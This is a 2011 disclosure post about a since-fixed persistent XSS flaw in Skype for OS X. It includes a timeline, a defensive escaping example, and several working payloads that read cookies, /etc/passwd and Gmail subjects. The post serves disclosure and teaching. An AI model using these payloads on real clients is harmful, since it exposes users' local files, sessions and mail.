Skype OS X Cross-Site Scripting Vulnerability
Posted by Kos on 06/18/2011 at 9:06 pm | Last modified: 11/08/2011 6:06 pm
Vulnerability: Cross Site Scripting
Affects: Skype 5.0.x up to and including 5.0.914 (OS X)
Skype (http://skype.com/) was vulnerable to (persistent?) XSS via messages from other users.
On top of that, the DOM of this window does not contain a set Origin, so it is possible to "bypass" the cross origin policy.
Authentication Status: Logged into Skype, but the payload persists in the chat logs,
so a user can be exploited again when viewing logs. Default privacy
settings require a user to add the attacker as a contact.
Attribution:
- April 6th, 2011 – Andrew van der Stock (@vanderaj). Originally discovered and disclosed to Skype.
- May 7th, 2011 – Skype IM (MAC OS X) – Is this the 0day ?
Injection used in the attack:
http://kos.io/"><script>alert(1)</script>
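
The payload above works because the message content is written into the chat markup without escaping: the double quote closes the attribute it lands in and the rest is parsed as live HTML. The following is an added example, not code from this post or from Skype, showing that unsafe string concatenation beside a hardened renderer that allow-lists the URL scheme and escapes both the attribute and the text context. The names `escapeHtml`, `isSafeLink`, `renderLinkUnsafe` and `renderLinkSafe`, and the http(s)-only policy, are my own choices for the example.

```javascript
// Added example (not from the original post or from Skype): rendering an
// untrusted URL taken from a chat message as a link without letting it
// break out of the attribute context.

// Escape the five HTML metacharacters; safe for text nodes and for
// double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical policy for this example: only http(s) links are clickable.
// Anything else (javascript:, file:, data:, unparsable input) is rendered
// as inert text.
function isSafeLink(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return false;
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:';
}

// Unsafe: the pattern that produces the vulnerability described above.
// The closing quote in the payload terminates href and the <script>
// that follows becomes part of the document.
function renderLinkUnsafe(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Safe: scheme allow-list, then escaping in both contexts the value
// is written into.
function renderLinkSafe(url) {
  if (!isSafeLink(url)) {
    return '<span>' + escapeHtml(url) + '</span>';
  }
  return '<a href="' + escapeHtml(url) + '">' + escapeHtml(url) + '</a>';
}

// Constructed sample input: the first payload quoted on this page.
const PAYLOAD = 'http://kos.io/"><script>alert(1)</script>';

console.log('unsafe:', renderLinkUnsafe(PAYLOAD));
console.log('safe:  ', renderLinkSafe(PAYLOAD));
```

With the payload as input, the unsafe renderer emits a literal `<script>` element, while the safe renderer emits `&lt;script&gt;` inside the attribute and the link text, which the HTML parser treats as data rather than markup.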

More advanced attacks:
Create an iFrame to Google.com within the Skype chat DOM. Write to that
iFrame's DOM.
http://kos.io/"><script>try{alert(document.getElementsByClassName("body")[0].innerHTML="<div\40style='height:200px;'><iframe\40src='http://www.google.com/'\40onload='hax.document.body.innerHTML=\42<img\40src=z\40onerror=\\\42alert(document.domain+document.cookie)\\\42>\42'\40id='hax'></iframe><div>")}catch(e){alert(e)}</script>

Create an XHR request to pull a local file such as /etc/hosts (the payload below reads file:///etc/passwd):
http://kos.io/"><script>x=new/**/XMLHttpRequest;x.open('get','file:///etc/passwd');x.send();x.onreadystatechange=function(){if(x.readyState==4)alert(x.responseText)}</script>

Create an XHR request to pull the mobile mail.google.com page, then run a regex over the response and pull out the email subjects and senders. (Terrible, terrible regex.)
http://kos.io/"><script>var/**/list='';var/**/winning='';x=new/**/XMLHttpRequest();x.open('get','https://mail.google.com/mail/u/0/x/asd');x.send();x.onreadystatechange=function(){if(x.readyState==4){list=x.responseText.match(/<div.class=.msgrd.>\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n<\/div>/g);for(i/**/in/**/list){winning=winning+list[i].match(/msgrd.>\n(.*)\n<br..>/)[1]+"\40||\40"+list[i].match(/[a-z0-9]{13}.>\n(.*)<\/a>/)[1]+'\n';}alert(winning)}}</script>

Resolution: May 6th, 2011 – Skype fixed this in their 5.0.922 update (released April 14th, 2011).
Update: After a friend went over the documentation that hooks WebKit into applications, he found this snippet. I was wrong in saying there was a null origin; it's just explicitly set to allow *:
"""
Once you have obtained the Window object for the target document, you can send it a message with the following code:
windowObj.postMessage('test message', 'http://example.com');
The first parameter is an arbitrary message.
The second parameter is the target origin value. An origin value is just a URL with the path part removed. For example, the origin of a local file is file://. By specifying a target origin, you are saying that your message should only be delivered if the target window's current contents came from that origin.
Although you may specify an asterisk (*) wildcard for the target origin (to allow the message to be sent regardless of where the contents of the target window came from), you should do so only if you are certain that it would not be harmful if your message were received by content originating from a different website.
"""